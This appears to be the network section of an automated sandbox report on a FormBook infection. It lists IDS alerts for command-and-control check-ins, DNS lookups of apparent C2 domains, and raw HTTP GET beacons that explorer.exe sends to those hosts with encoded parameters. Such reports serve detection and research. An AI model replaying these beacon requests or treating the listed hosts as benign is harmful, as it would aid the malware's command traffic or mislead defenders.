                                                                          04/08/24-10:04:46.028484TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974680192.168.2.4198.185.159.144
                                                                          04/08/24-10:07:11.266292TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975180192.168.2.445.88.201.15
                                                                          04/08/24-10:04:25.566585TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974580192.168.2.423.227.38.74
                                                                          04/08/24-10:05:47.854456TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.413.248.169.48
                                                                          04/08/24-10:05:27.536502TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974780192.168.2.466.235.200.146
                                                                          04/08/24-10:03:25.123202TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.4172.67.165.166

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Apr 8, 2024 10:03:24.998940945 CEST4974280192.168.2.4172.67.165.166
                                                                          Apr 8, 2024 10:03:25.123028994 CEST8049742172.67.165.166192.168.2.4
                                                                          Apr 8, 2024 10:03:25.123125076 CEST4974280192.168.2.4172.67.165.166
                                                                          Apr 8, 2024 10:03:25.123202085 CEST4974280192.168.2.4172.67.165.166
                                                                          Apr 8, 2024 10:03:25.247260094 CEST8049742172.67.165.166192.168.2.4
                                                                          Apr 8, 2024 10:03:25.314632893 CEST8049742172.67.165.166192.168.2.4
                                                                          Apr 8, 2024 10:03:25.314652920 CEST8049742172.67.165.166192.168.2.4
                                                                          Apr 8, 2024 10:03:25.314666033 CEST8049742172.67.165.166192.168.2.4
                                                                          Apr 8, 2024 10:03:25.314677954 CEST8049742172.67.165.166192.168.2.4
                                                                          Apr 8, 2024 10:03:25.314687967 CEST8049742172.67.165.166192.168.2.4
                                                                          Apr 8, 2024 10:03:25.314718008 CEST4974280192.168.2.4172.67.165.166
                                                                          Apr 8, 2024 10:03:25.314757109 CEST8049742172.67.165.166192.168.2.4
                                                                          Apr 8, 2024 10:03:25.314798117 CEST4974280192.168.2.4172.67.165.166
                                                                          Apr 8, 2024 10:03:25.314814091 CEST4974280192.168.2.4172.67.165.166
                                                                          Apr 8, 2024 10:03:25.314867020 CEST4974280192.168.2.4172.67.165.166
                                                                          Apr 8, 2024 10:03:45.183785915 CEST4974480192.168.2.4102.134.40.151
                                                                          Apr 8, 2024 10:03:45.371068001 CEST8049744102.134.40.151192.168.2.4
                                                                          Apr 8, 2024 10:03:45.371205091 CEST4974480192.168.2.4102.134.40.151
                                                                          Apr 8, 2024 10:03:45.371300936 CEST4974480192.168.2.4102.134.40.151
                                                                          Apr 8, 2024 10:03:45.558785915 CEST8049744102.134.40.151192.168.2.4
                                                                          Apr 8, 2024 10:03:45.559149027 CEST8049744102.134.40.151192.168.2.4
                                                                          Apr 8, 2024 10:03:45.559257030 CEST4974480192.168.2.4102.134.40.151
                                                                          Apr 8, 2024 10:03:45.559298992 CEST4974480192.168.2.4102.134.40.151
                                                                          Apr 8, 2024 10:03:45.746831894 CEST8049744102.134.40.151192.168.2.4
                                                                          Apr 8, 2024 10:04:25.437056065 CEST4974580192.168.2.423.227.38.74
                                                                          Apr 8, 2024 10:04:25.562024117 CEST804974523.227.38.74192.168.2.4
                                                                          Apr 8, 2024 10:04:25.566507101 CEST4974580192.168.2.423.227.38.74
                                                                          Apr 8, 2024 10:04:25.566585064 CEST4974580192.168.2.423.227.38.74
                                                                          Apr 8, 2024 10:04:25.691310883 CEST804974523.227.38.74192.168.2.4
                                                                          Apr 8, 2024 10:04:25.700436115 CEST804974523.227.38.74192.168.2.4
                                                                          Apr 8, 2024 10:04:25.700649977 CEST804974523.227.38.74192.168.2.4
                                                                          Apr 8, 2024 10:04:25.700700045 CEST4974580192.168.2.423.227.38.74
                                                                          Apr 8, 2024 10:04:25.700716972 CEST804974523.227.38.74192.168.2.4
                                                                          Apr 8, 2024 10:04:25.700769901 CEST804974523.227.38.74192.168.2.4
                                                                          Apr 8, 2024 10:04:25.700799942 CEST804974523.227.38.74192.168.2.4
                                                                          Apr 8, 2024 10:04:25.700814009 CEST4974580192.168.2.423.227.38.74
                                                                          Apr 8, 2024 10:04:25.700835943 CEST804974523.227.38.74192.168.2.4
                                                                          Apr 8, 2024 10:04:25.700889111 CEST4974580192.168.2.423.227.38.74
                                                                          Apr 8, 2024 10:04:25.700925112 CEST4974580192.168.2.423.227.38.74
                                                                          Apr 8, 2024 10:04:25.827326059 CEST804974523.227.38.74192.168.2.4
                                                                          Apr 8, 2024 10:04:45.869095087 CEST4974680192.168.2.4198.185.159.144
                                                                          Apr 8, 2024 10:04:46.028310061 CEST8049746198.185.159.144192.168.2.4
                                                                          Apr 8, 2024 10:04:46.028387070 CEST4974680192.168.2.4198.185.159.144
                                                                          Apr 8, 2024 10:04:46.028484106 CEST4974680192.168.2.4198.185.159.144
                                                                          Apr 8, 2024 10:04:46.190054893 CEST8049746198.185.159.144192.168.2.4
                                                                          Apr 8, 2024 10:04:46.191276073 CEST8049746198.185.159.144192.168.2.4
                                                                          Apr 8, 2024 10:04:46.191355944 CEST8049746198.185.159.144192.168.2.4
                                                                          Apr 8, 2024 10:04:46.191409111 CEST8049746198.185.159.144192.168.2.4
                                                                          Apr 8, 2024 10:04:46.191421032 CEST4974680192.168.2.4198.185.159.144
                                                                          Apr 8, 2024 10:04:46.191421986 CEST8049746198.185.159.144192.168.2.4
                                                                          Apr 8, 2024 10:04:46.191495895 CEST4974680192.168.2.4198.185.159.144
                                                                          Apr 8, 2024 10:04:46.191508055 CEST8049746198.185.159.144192.168.2.4
                                                                          Apr 8, 2024 10:04:46.191533089 CEST8049746198.185.159.144192.168.2.4
                                                                          Apr 8, 2024 10:04:46.191557884 CEST4974680192.168.2.4198.185.159.144
                                                                          Apr 8, 2024 10:04:46.191585064 CEST4974680192.168.2.4198.185.159.144
                                                                          Apr 8, 2024 10:04:46.191646099 CEST8049746198.185.159.144192.168.2.4
                                                                          Apr 8, 2024 10:04:46.191683054 CEST8049746198.185.159.144192.168.2.4
                                                                          Apr 8, 2024 10:04:46.191724062 CEST4974680192.168.2.4198.185.159.144
                                                                          Apr 8, 2024 10:04:46.191745043 CEST8049746198.185.159.144192.168.2.4
                                                                          Apr 8, 2024 10:04:46.191806078 CEST8049746198.185.159.144192.168.2.4
                                                                          Apr 8, 2024 10:04:46.191847086 CEST4974680192.168.2.4198.185.159.144
                                                                          Apr 8, 2024 10:04:46.350611925 CEST8049746198.185.159.144192.168.2.4
                                                                          Apr 8, 2024 10:04:46.350645065 CEST8049746198.185.159.144192.168.2.4
                                                                          Apr 8, 2024 10:04:46.350658894 CEST8049746198.185.159.144192.168.2.4
                                                                          Apr 8, 2024 10:04:46.350672960 CEST8049746198.185.159.144192.168.2.4
                                                                          Apr 8, 2024 10:04:46.350672960 CEST4974680192.168.2.4198.185.159.144
                                                                          Apr 8, 2024 10:04:46.350696087 CEST4974680192.168.2.4198.185.159.144
                                                                          Apr 8, 2024 10:04:46.350712061 CEST4974680192.168.2.4198.185.159.144
                                                                          Apr 8, 2024 10:05:27.412060976 CEST4974780192.168.2.466.235.200.146
                                                                          Apr 8, 2024 10:05:27.536112070 CEST804974766.235.200.146192.168.2.4
                                                                          Apr 8, 2024 10:05:27.536398888 CEST4974780192.168.2.466.235.200.146
                                                                          Apr 8, 2024 10:05:27.536501884 CEST4974780192.168.2.466.235.200.146
                                                                          Apr 8, 2024 10:05:27.660407066 CEST804974766.235.200.146192.168.2.4
                                                                          Apr 8, 2024 10:05:27.916409016 CEST804974766.235.200.146192.168.2.4
                                                                          Apr 8, 2024 10:05:27.916471004 CEST804974766.235.200.146192.168.2.4
                                                                          Apr 8, 2024 10:05:27.916522980 CEST4974780192.168.2.466.235.200.146
                                                                          Apr 8, 2024 10:05:27.916580915 CEST4974780192.168.2.466.235.200.146
                                                                          Apr 8, 2024 10:05:28.040644884 CEST804974766.235.200.146192.168.2.4
                                                                          Apr 8, 2024 10:05:47.726268053 CEST4974880192.168.2.413.248.169.48
                                                                          Apr 8, 2024 10:05:47.851480961 CEST804974813.248.169.48192.168.2.4
                                                                          Apr 8, 2024 10:05:47.854454994 CEST4974880192.168.2.413.248.169.48
                                                                          Apr 8, 2024 10:05:47.854455948 CEST4974880192.168.2.413.248.169.48
                                                                          Apr 8, 2024 10:05:47.978842020 CEST804974813.248.169.48192.168.2.4
                                                                          Apr 8, 2024 10:05:48.007040024 CEST804974813.248.169.48192.168.2.4
                                                                          Apr 8, 2024 10:05:48.007061005 CEST804974813.248.169.48192.168.2.4
                                                                          Apr 8, 2024 10:05:48.007153034 CEST4974880192.168.2.413.248.169.48
                                                                          Apr 8, 2024 10:05:48.007189035 CEST4974880192.168.2.413.248.169.48
                                                                          Apr 8, 2024 10:05:48.011627913 CEST804974813.248.169.48192.168.2.4
                                                                          Apr 8, 2024 10:05:48.011671066 CEST4974880192.168.2.413.248.169.48
                                                                          Apr 8, 2024 10:05:48.131624937 CEST804974813.248.169.48192.168.2.4
                                                                          Apr 8, 2024 10:06:28.870845079 CEST4974980192.168.2.445.76.63.192
                                                                          Apr 8, 2024 10:06:29.007611036 CEST804974945.76.63.192192.168.2.4
                                                                          Apr 8, 2024 10:06:29.007764101 CEST4974980192.168.2.445.76.63.192
                                                                          Apr 8, 2024 10:06:29.007960081 CEST4974980192.168.2.445.76.63.192
                                                                          Apr 8, 2024 10:06:29.144556046 CEST804974945.76.63.192192.168.2.4
                                                                          Apr 8, 2024 10:06:29.144575119 CEST804974945.76.63.192192.168.2.4
                                                                          Apr 8, 2024 10:06:29.144589901 CEST804974945.76.63.192192.168.2.4
                                                                          Apr 8, 2024 10:06:29.144931078 CEST4974980192.168.2.445.76.63.192
                                                                          Apr 8, 2024 10:06:29.144931078 CEST4974980192.168.2.445.76.63.192
                                                                          Apr 8, 2024 10:06:29.281713963 CEST804974945.76.63.192192.168.2.4
                                                                          Apr 8, 2024 10:06:49.748749018 CEST4975080192.168.2.466.147.240.91
                                                                          Apr 8, 2024 10:06:49.944444895 CEST804975066.147.240.91192.168.2.4
                                                                          Apr 8, 2024 10:06:49.944559097 CEST4975080192.168.2.466.147.240.91
                                                                          Apr 8, 2024 10:06:49.944631100 CEST4975080192.168.2.466.147.240.91
                                                                          Apr 8, 2024 10:06:50.140336990 CEST804975066.147.240.91192.168.2.4
                                                                          Apr 8, 2024 10:06:50.147938967 CEST804975066.147.240.91192.168.2.4
                                                                          Apr 8, 2024 10:06:50.147980928 CEST804975066.147.240.91192.168.2.4
                                                                          Apr 8, 2024 10:06:50.148042917 CEST4975080192.168.2.466.147.240.91
                                                                          Apr 8, 2024 10:06:50.148123026 CEST4975080192.168.2.466.147.240.91
                                                                          Apr 8, 2024 10:06:50.343704939 CEST804975066.147.240.91192.168.2.4

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Apr 8, 2024 10:03:24.766024113 CEST5729353192.168.2.41.1.1.1
                                                                          Apr 8, 2024 10:03:24.998034954 CEST53572931.1.1.1192.168.2.4
                                                                          Apr 8, 2024 10:03:44.700623035 CEST5867253192.168.2.41.1.1.1
                                                                          Apr 8, 2024 10:03:45.183186054 CEST53586721.1.1.1192.168.2.4
                                                                          Apr 8, 2024 10:04:04.747859001 CEST6369553192.168.2.41.1.1.1
                                                                          Apr 8, 2024 10:04:04.875843048 CEST53636951.1.1.1192.168.2.4
                                                                          Apr 8, 2024 10:04:25.216039896 CEST5024653192.168.2.41.1.1.1
                                                                          Apr 8, 2024 10:04:25.436131954 CEST53502461.1.1.1192.168.2.4
                                                                          Apr 8, 2024 10:04:45.682569981 CEST5781353192.168.2.41.1.1.1
                                                                          Apr 8, 2024 10:04:45.868081093 CEST53578131.1.1.1192.168.2.4
                                                                          Apr 8, 2024 10:05:06.420367002 CEST6268253192.168.2.41.1.1.1
                                                                          Apr 8, 2024 10:05:06.577879906 CEST53626821.1.1.1192.168.2.4
                                                                          Apr 8, 2024 10:05:26.950292110 CEST5801653192.168.2.41.1.1.1
                                                                          Apr 8, 2024 10:05:27.411144972 CEST53580161.1.1.1192.168.2.4
                                                                          Apr 8, 2024 10:05:47.590989113 CEST5677653192.168.2.41.1.1.1
                                                                          Apr 8, 2024 10:05:47.722138882 CEST53567761.1.1.1192.168.2.4
                                                                          Apr 8, 2024 10:06:28.651906013 CEST5151653192.168.2.41.1.1.1
                                                                          Apr 8, 2024 10:06:28.869986057 CEST53515161.1.1.1192.168.2.4
                                                                          Apr 8, 2024 10:06:49.372261047 CEST5917053192.168.2.41.1.1.1
                                                                          Apr 8, 2024 10:06:49.721513987 CEST53591701.1.1.1192.168.2.4
                                                                          Apr 8, 2024 10:07:10.528311014 CEST5281653192.168.2.41.1.1.1
                                                                          Apr 8, 2024 10:07:11.099515915 CEST53528161.1.1.1192.168.2.4

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Apr 8, 2024 10:03:24.766024113 CEST192.168.2.41.1.1.10xc78bStandard query (0)www.xaqh.infoA (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:03:44.700623035 CEST192.168.2.41.1.1.10x7a8dStandard query (0)www.mingshengglass.comA (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:04:04.747859001 CEST192.168.2.41.1.1.10x2546Standard query (0)www.yoursweets.onlineA (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:04:25.216039896 CEST192.168.2.41.1.1.10x6d70Standard query (0)www.massagechairspecialists.comA (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:04:45.682569981 CEST192.168.2.41.1.1.10x235Standard query (0)www.mks-digital.netA (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:05:06.420367002 CEST192.168.2.41.1.1.10xe10dStandard query (0)www.brandonbirk.comA (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:05:26.950292110 CEST192.168.2.41.1.1.10xcc84Standard query (0)www.snugandkind.comA (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:05:47.590989113 CEST192.168.2.41.1.1.10x60cfStandard query (0)www.owletbaby.shopA (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:06:28.651906013 CEST192.168.2.41.1.1.10x62d3Standard query (0)www.studioenginedemo.comA (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:06:49.372261047 CEST192.168.2.41.1.1.10x9441Standard query (0)www.oregonjobs.coA (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:07:10.528311014 CEST192.168.2.41.1.1.10x731aStandard query (0)www.gratiasempirellc.comA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Apr 8, 2024 10:03:24.998034954 CEST1.1.1.1192.168.2.40xc78bNo error (0)www.xaqh.info172.67.165.166A (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:03:24.998034954 CEST1.1.1.1192.168.2.40xc78bNo error (0)www.xaqh.info104.21.16.9A (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:03:45.183186054 CEST1.1.1.1192.168.2.40x7a8dNo error (0)www.mingshengglass.com102.134.40.151A (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:04:04.875843048 CEST1.1.1.1192.168.2.40x2546Name error (3)www.yoursweets.onlinenonenoneA (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:04:25.436131954 CEST1.1.1.1192.168.2.40x6d70No error (0)www.massagechairspecialists.comf24545-3.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                          Apr 8, 2024 10:04:25.436131954 CEST1.1.1.1192.168.2.40x6d70No error (0)f24545-3.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                          Apr 8, 2024 10:04:25.436131954 CEST1.1.1.1192.168.2.40x6d70No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:04:45.868081093 CEST1.1.1.1192.168.2.40x235No error (0)www.mks-digital.netext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)false
                                                                          Apr 8, 2024 10:04:45.868081093 CEST1.1.1.1192.168.2.40x235No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:04:45.868081093 CEST1.1.1.1192.168.2.40x235No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:04:45.868081093 CEST1.1.1.1192.168.2.40x235No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:04:45.868081093 CEST1.1.1.1192.168.2.40x235No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:05:06.577879906 CEST1.1.1.1192.168.2.40xe10dName error (3)www.brandonbirk.comnonenoneA (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:05:27.411144972 CEST1.1.1.1192.168.2.40xcc84No error (0)www.snugandkind.comsnugandkind.comCNAME (Canonical name)IN (0x0001)false
                                                                          Apr 8, 2024 10:05:27.411144972 CEST1.1.1.1192.168.2.40xcc84No error (0)snugandkind.com66.235.200.146A (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:05:47.722138882 CEST1.1.1.1192.168.2.40x60cfNo error (0)www.owletbaby.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:05:47.722138882 CEST1.1.1.1192.168.2.40x60cfNo error (0)www.owletbaby.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:06:28.869986057 CEST1.1.1.1192.168.2.40x62d3No error (0)www.studioenginedemo.comstudioenginedemo.comCNAME (Canonical name)IN (0x0001)false
                                                                          Apr 8, 2024 10:06:28.869986057 CEST1.1.1.1192.168.2.40x62d3No error (0)studioenginedemo.com45.76.63.192A (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:06:49.721513987 CEST1.1.1.1192.168.2.40x9441No error (0)www.oregonjobs.cooregonjobs.coCNAME (Canonical name)IN (0x0001)false
                                                                          Apr 8, 2024 10:06:49.721513987 CEST1.1.1.1192.168.2.40x9441No error (0)oregonjobs.co66.147.240.91A (IP address)IN (0x0001)false
                                                                          Apr 8, 2024 10:07:11.099515915 CEST1.1.1.1192.168.2.40x731aNo error (0)www.gratiasempirellc.comgratiasempirellc.comCNAME (Canonical name)IN (0x0001)false
                                                                          Apr 8, 2024 10:07:11.099515915 CEST1.1.1.1192.168.2.40x731aNo error (0)gratiasempirellc.com45.88.201.15A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • www.xaqh.info
                                                                          • www.mingshengglass.com
                                                                          • www.massagechairspecialists.com
                                                                          • www.mks-digital.net
                                                                          • www.snugandkind.com
                                                                          • www.owletbaby.shop
                                                                          • www.studioenginedemo.com
                                                                          • www.oregonjobs.co

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.449742172.67.165.166802580C:\Windows\explorer.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Apr 8, 2024 10:03:25.123202085 CEST160OUTGET /vr01/?Vr=L4nHMf5x&YN9P-lUP=IPhgDyoL8PETBIlA+LipHiQIJ5tdYs8vDEe7V5bx7imqp8ZSB+vz7lbDvtba/1SpkLzf HTTP/1.1
                                                                          Host: www.xaqh.info
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 8, 2024 10:03:25.314632893 CEST1286INHTTP/1.1 200 OK
                                                                          Date: Mon, 08 Apr 2024 08:03:25 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Last-Modified: Mon, 08 Apr 2024 02:36:06 GMT
                                                                          Vary: Accept-Encoding
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FNaHDgiwv%2BW0K6IEFCkLRWUso%2B9w%2F9%2BY9r6CJV21RJoJhjtNcZGGg08oYITzFovScZMZeexhm%2FP9aDdXgpxABihINaPJwxqPtVZxE3tj5OZtyHNF0jgoEtDz0amaIMvY"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8710bda26ea667ea-MIA
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          Data Raw: 64 39 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 64 3d 22 68 74 6d 6c 52 6f 6f 74 22 20 63 6c 61 73 73 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 61 70 70 2e 63 6f 6e 66 69 67 2e 6a 73 3f 76 3d 30 2e 30 2e 31 2d 31 37 31 32 35 34 33 37 33 36 39 32 37 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 69 63 6f 22 20 68 72 65 66 3d 22 2f 69 63 6f 2f 66 61 76 69 63 6f 6e 2d 34 37 63 36 64 36 64 64 2e 69 63 6f 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 2f 3e 3c 74 69 74 6c 65 3e 44 69 73 6e 65 79 47 4f 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 68 2c 6f 2c 74 2c 6a 2c 61 2c 72 29 7b 0a 20 20 20 20 20 20 20 20 20 20 68 2e 68 6a 3d 68 2e 68 6a 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 28 68 2e 68 6a 2e 71 3d 68 2e 68 6a 2e 71 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 68 2e 5f 68 6a 53 65 74 74 69 6e 67 73 3d 7b 68 6a 69 64 3a 33 39 31 37 36 39 37 2c 68 6a 73 76 3a 36 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 61 3d 6f 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 72 3d 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65
                                                                          Data Ascii: d96<!doctype html><html id="htmlRoot" class><head><script src="/app.config.js?v=0.0.1-1712543736927"></script><meta charset="UTF-8"/><link rel="icon" type="image/ico" href="/ico/favicon-47c6d6dd.ico"/><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Poppins"/><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,viewport-fit=cover"/><title>DisneyGO</title><script>(function(h,o,t,j,a,r){ h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)}; h._hjSettings={hjid:3917697,hjsv:6}; a=o.getElementsByTagName('head')[0]; r=o.createEleme
                                                                          Apr 8, 2024 10:03:25.314652920 CEST1286INData Raw: 6e 74 28 27 73 63 72 69 70 74 27 29 3b 72 2e 61 73 79 6e 63 3d 31 3b 0a 20 20 20 20 20 20 20 20 20 20 72 2e 73 72 63 3d 74 2b 68 2e 5f 68 6a 53 65 74 74 69 6e 67 73 2e 68 6a 69 64 2b 6a 2b 68 2e 5f 68 6a 53 65 74 74 69 6e 67 73 2e 68 6a 73 76 3b
                                                                          Data Ascii: nt('script');r.async=1; r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv; a.appendChild(r); })(window,document,'https://static.hotjar.com/c/hotjar-','.js?sv=');</script><script async src="https://www.googletagmanager.c
                                                                          Apr 8, 2024 10:03:25.314666033 CEST1286INData Raw: 63 62 34 36 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 69 6e 64 65 78 2d 66 36 36 62 36 36 31 30 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68
                                                                          Data Ascii: cb46.css"><link rel="stylesheet" href="/css/index-f66b6610.css"><link rel="stylesheet" href="/css/index-46f19c1a.css"></head><body><div id="app"><style>.first-loading-wrap{display:flex;width:100%;height:100vh;background-color:#1d1d1d;justify-c
                                                                          Apr 8, 2024 10:03:25.314677954 CEST268INData Raw: 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 34 30 35 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 61 6e 74 53 70 69 6e 4d 6f 76 65 7b 74 6f 7b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 61 6e
                                                                          Data Ascii: ansform:rotate(405deg)}}@keyframes antSpinMove{to{opacity:1}}@-webkit-keyframes antSpinMove{to{opacity:1}}</style><div class="first-loading-wrap"><div class="loading-wrap"><span class="dot dot-spin"><i></i><i></i><i></i><i></i></span></div></d
                                                                          Apr 8, 2024 10:03:25.314687967 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.449744102.134.40.151802580C:\Windows\explorer.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Apr 8, 2024 10:03:45.371300936 CEST169OUTGET /vr01/?YN9P-lUP=p/xcNqyzh27Txsj3CquMV/rjlfuack/vmC9Eop/11cDYDFLPNTQG2lepFRnhiYBgsx3b&Vr=L4nHMf5x HTTP/1.1
                                                                          Host: www.mingshengglass.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.44974523.227.38.74802580C:\Windows\explorer.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Apr 8, 2024 10:04:25.566585064 CEST178OUTGET /vr01/?YN9P-lUP=S/bPAjqIKQKwHrqZpy8n8RiCdt73FJpF/P8H7i/MmAA1ELfbDMBmDqe40tCi9lxWreLB&Vr=L4nHMf5x HTTP/1.1
                                                                          Host: www.massagechairspecialists.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 8, 2024 10:04:25.700436115 CEST1286INHTTP/1.1 403 Forbidden
                                                                          Date: Mon, 08 Apr 2024 08:04:25 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 4518
                                                                          Connection: close
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          Referrer-Policy: same-origin
                                                                          Cache-Control: max-age=15
                                                                          Expires: Mon, 08 Apr 2024 08:04:40 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wANL7iq3n8fB6IVRAeYwRGh3sIo3VeJH9A%2F9X5RFh%2BF5wEjXy8HwdWZHaJonMe%2BesMkpMRkY4I4hP%2F17Mbxycb2CIz1YJ63HVLOQazvBus2LQ3%2Br4eGUcfnpnWWgzX8dahcqg3PacsXGW40pfKWENZg%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                          Server-Timing: cfRequestDuration;dur=8.000135
                                                                          X-XSS-Protection: 1; mode=block
                                                                          X-Content-Type-Options: nosniff
                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                          X-Download-Options: noopen
                                                                          Server: cloudflare
                                                                          CF-RAY: 8710bf1c2b697425-MIA
                                                                          alt-svc: h3=":443"; ma=86400
